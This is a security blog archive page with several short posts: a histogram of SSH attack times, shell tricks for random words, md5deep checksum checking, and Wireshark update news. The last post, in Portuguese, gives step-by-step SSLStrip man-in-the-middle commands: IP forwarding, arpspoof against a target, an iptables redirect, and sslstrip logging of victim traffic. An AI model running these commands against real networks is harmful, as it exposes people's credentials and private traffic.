Feeds:
Posts
Comments

Archive for the ‘Seguranca’ Category

Despite all the wonderful text-oriented and processing tools in UNIX, one tool is surprisingly absent: an ability to generate some kind of text-based graph from an input stream. This would be useful for all sorts of things, but most notably for “eye-balling” the relative frequencies of similar data-sets. Such data-sets could be: logs of every sort, file-types in a directory, version control statistics, etc. The graph could be a simple thing, such as dashes that take up to the width of the current TTY. But as far as I could tell, no such tool exists.

Until now.

So here I present a step-by-step instruction on how to write such a tool in Perl. If you are hasty, you can simply download the the tool, rename it to just “histogram”, make it executable, and put it in your bin directory.

In the posts that follow, I’ll detail its usage and construction.

Here’s a quick example usage and output:

$ histogram ‘/ sshd\[[0-9]*\]: Connection closed by UNKNOWN/ { print substr($3,1,2) }’ /var/log/secure*
00:———————————————————————-
01:————————————————————————–
02:—————————————————————————
03:————————————————————————–
04:————————————————————————–
05:—————————————————————————
06:—————————————————————————
07:—————————————————————————–
08:—————————————————————————-
09:————————————————————————-
10:—————————————————————————-
11:—————————————————————————
12:———————————————————————–
13:————————————————————————-
14:——————————————-
15:—————————————
16:———————————–
17:————————————-
18:————————————–
19:————————————
20:————————————-
21:————————————
22:—————————————-
23:————————————–
What we’re trying to do here is get an idea how many times hackers are trying to penetrate the system with SSH attempts. So we use awk to look through the /var/log/secure logs for a string like “sshd … Connection closed by UNKNOWN” and print out the hour of the day each time the message occurred. Histogram then does the rest and prints out a “graph” so we can get an idea of the distribution of attack times — were they in the morning, the afternoon, all day, or what? In this case, it seems from midnight to about 2pm.

Advertisements

Read Full Post »

I was screwing around this morning and I needed some random words to test something with. The words needed to bereal words, not just random sequences of characters (btw, you can generate a random sequence of 8 characters from the shell using jot -r -c 8 a z | rs -g 0 8). In this case, I decided to simply grab a random word from /usr/share/dict/words.

Hmm, but how do I grab a random word from a file? My solution was to generate a random number in the range [1..n]where n is the number of lines in the file, cat -n the file so that line numbers are printed, grep for the line matching the random number, then print out the second column. It looks like this:

$ n=$(cat /usr/share/dict/words | wc -l)
$ cat -n /usr/share/dict/words | grep -w $(jot -r 1 1 $n) | cut -f2
idic
$ cat -n /usr/share/dict/words | grep -w $(jot -r 1 1 $n) | cut -f2
goldentop
$ cat -n /usr/share/dict/words | grep -w $(jot -r 1 1 $n) | cut -f2
Hamitism
$ cat -n /usr/share/dict/words | grep -w $(jot -r 1 1 $n) | cut -f2
accumulativeness
$ cat -n /usr/share/dict/words | grep -w $(jot -r 1 1 $n) | cut -f2
ratihabition

Read Full Post »

In Debian and derived distros, to install the package:

sudo apt-get update

sudo apt-get install md5deep

Utilities that are installed also include sha1deep, sha256deep etc. The syntax for them is the same,
the only thing that varies is the checksum format (length of sum’s string representation).

To check a file’s (or various files’) integrity use the command:

md5deep -wem [ … ]

Options:

w shows which file matched which checksum entry (a filename, also); e shows estimated time remaining
(and how much has been checked for the current file); m is for match mode, this mode just implies
trying to match files for their sums and displaying which files matched such sums. But what if you
get to check lots of files? You do not want to check each file matched, but only which files did not
match. Here is how:

md5deep -esx [ … ]

Options:

e shows estimated time remaining (and how much has been checked for the current file); s is for
silent, you just want to see which file did not match and nothing else; x is for negative matching
mode i.e. only files that did not match are displayed. For a recursive match a possible (and common)
use would be to add the -r option for recursive check, and instead of files point out the base
directory (to correspond to the entries’ dirname in the checksum file) which in the example is the
current working directory a.k.a. ‘.’ (a dot):

md5deep -resx .

VERY IMPORTANT NOTE: -m and -x options must immediately precede the as such file is an
argument to these options. So, if you condense the options like in the examples given you must
ensure that -m (or -x) is the last option as the argument that follows is actually this option’s
argument.

Read Full Post »

Como analisador de protocolos de rede mais popular do mundo , o Wireshark tem agora uma atualização para as versões 1.4.4 e 1.2.15. Esta atualização corrige muitas vulnerabilidades , tais como :CVE-2011-0538, CVE-2011-0713 e o NTLMSSP dissector.

Os protocolos a seguir foram atualizados : ANSI MAP, BitTorrent, DCM, DHCPv6, DTAP, DTPT, E.212, GSM Management, GTP, HIP, IEEE 802.15.4, IPP, LDAP, LLDP, Netflow, NTLMSSP, P_Mul, Quake, Skinny, SMB, SNMP, ULP. Além disso, você pode ler as capturas através do LANalyzer, Nokia DCT3, e arquivos no formato Pcap-ng.

Para obter uma lista completa das alterações, veja:
Docs: – http://www.wireshark.org
Download: http://www.wireshark.org
Fonte: http://www.pentestit.com

Read Full Post »

Desde que Moxie Moulinsart exibiu seu SSLStrip na Blackhat, o MODO PARANÓICO de muitas pessoas começou a dar o alarme, e não é pra menos, já que com essa ferramenta qualquer pessoa pode capturar seu tráfego SSL sem problemas.

O funcionamento do SSLStrip é simples, substituindo todas as requisições “https://” de uma página por “http://”, e realiza um MITM (Man-In-The-Middle) entre o servidor e o cliente.
A ideia é que a vítima e o atacante se comuniquem através de HTTP, enquanto o atacante e o servidor se comunicam em HTTPS, com o certificado do servidor. Portanto, o atacante é capaz de ver todo o tráfego da vítima em texto plano.

Resumidamente, os passos seriam:

Configurar o IP Forwarding:
# echo 1 > /proc/sys/net/ipv4/ip_forward

Realizar um ataque ARP MITM entre as 2 máquinas:
# arpspoof -i eth0 -t HOST_ALVO

Redirecionar o tráfego com iptables:
# iptables -t nat -A PREROUTING -p tcp -destination-port 80 -j REDIRECT -to-ports 8080

Iniciar o SSLStrip, definindo um arquivo onde armazenará os dados capturados:
# python sslstrip.py -w archivo

Espero que achem interessante!

Página oficial do SSLStrip: http://www.thoughtcrime.org/software/sslstrip/

Publicado por Luiz Vieira

Read Full Post »